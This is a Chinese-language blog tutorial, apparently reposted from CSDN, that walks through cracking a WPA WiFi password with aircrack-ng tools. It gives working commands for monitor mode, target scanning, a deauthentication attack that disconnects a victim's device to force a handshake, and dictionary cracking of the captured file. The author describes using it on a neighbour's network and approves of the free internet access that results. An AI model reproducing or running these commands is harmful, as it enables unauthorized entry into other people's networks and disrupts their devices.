首先先介绍一下工具:
(1)一个移动无线网卡
(2)一个装有aircrack的linux(系统最好为kali),
(3)靠谱的密码字典。
- 1
- 2
第一步,查看网卡信息
打开你的终端,查看一下当前的无线网卡
root@kali:~# airmon-ng
显示如下:
记住你当前的网卡名 wlan0mon
第二步,启动这个网卡
root@kali:~# airmon-ng start wlan0mon
第三步,开始探测附近的wifi
root@kali:~# airodump-ng wlan0mon
然后显示如下:
选个目标,最好信号要好一点,PWR绝对值越小越好,选择好你的目标记住BSSID和CH之后,可以直接ctrl-c终止搜索。
第四步,监听路由
在终端里头继续输入
root@kali:~# airodump-ng -w woshoubao -c 6 --bssid 00:0F:01:A9:C3:B2 wlan0mon --ignore-negative-one
上面的woshoubao是待会儿截取到的握手包保存的文件名,可自定义。-c后头的6是在上一张图片中CH(信道),–bssid也是上张图片中你自己选择的攻击目标的BSSID,这两项要根据自己刚刚选择的攻击目标的信息填写,这里的wlan0mon是我的网卡名
然后出现如下
这里显示出来的是当前连接这个wifi的设备的mac地址,这里我就选择第一行这台设备作为攻击目标,记下它的STATION,然后新建一个终端,记住是新建,不要把上面图片的这个终端关掉!!
第五步,截取握手包
在新终端
root@kali:~# aireplay-ng --deaut 20 -a 00:0F:01:A9:C3:B2 -c BC:D1:**:**:**:** wlan0mon --ignore-negative-one
–deaut后面的20代表攻击20次,-a后是路由器mac地址(即前面让你记住的那个BSSID,其实也就是STATION 前面的那个东西),-c后是被攻击机器mac地址(即让你记住的 STATION )。这个是向连接路由器的这个被攻击机发送大量数据导致被攻击机wifi断开,等待客户机重连wifi截获握手包,我们静静等待之前那个终端中出现如下界面。(如不不进行攻击也是可以的,只要有机器连上这个wifi我们就会截获到握手包,我们进行攻击的目的是使其重连)
然后在刚刚的终端中出现如下的界面
发现多了一个红框内的东西,这就是我们截获到的握手包,至此我们的入侵工作就差不多了,接下来就是对截获的握手包开始进行破解了。
手写你会在主目录home下发现woshoubao-01.cap文件,对,这就是我们截获的握手包,然后接着我们需要一个密码字典,破解的成功与否就看这个密码字典了,所以大家要选好点的。
下面我们继续
第六步,开始破解
打开终端,输入
aircrack-ng -w 123.txt woshoubao-01.cap
这里-w后面是你的密码字典,可以和握手包一起放在主目录下,然后后头就是握手包的名字,回车后开始暴力破解这个握手包。
如下图:
然后就是耐心等待破解了,密码字典越大,破解时间越久,幸好我这个邻居密码比较简单。。。
破解完成后就出现下面这样:
至此就破解完成啦,好好享受网上冲浪的快感吧。现在觉得这个破解方式还是比较实在的,还有一种破解方式是使用pin码破解,不过现在大部分路由器都会有自主防御,成功率不高,在此就不说了
转载地址:http://blog.csdn.net/MrYangLL/article/details/51996499
ps : 其他基于kail 的破解方式
http://blog.csdn.net/Edroid1530/article/details/74446651?locationNum=4&fps=1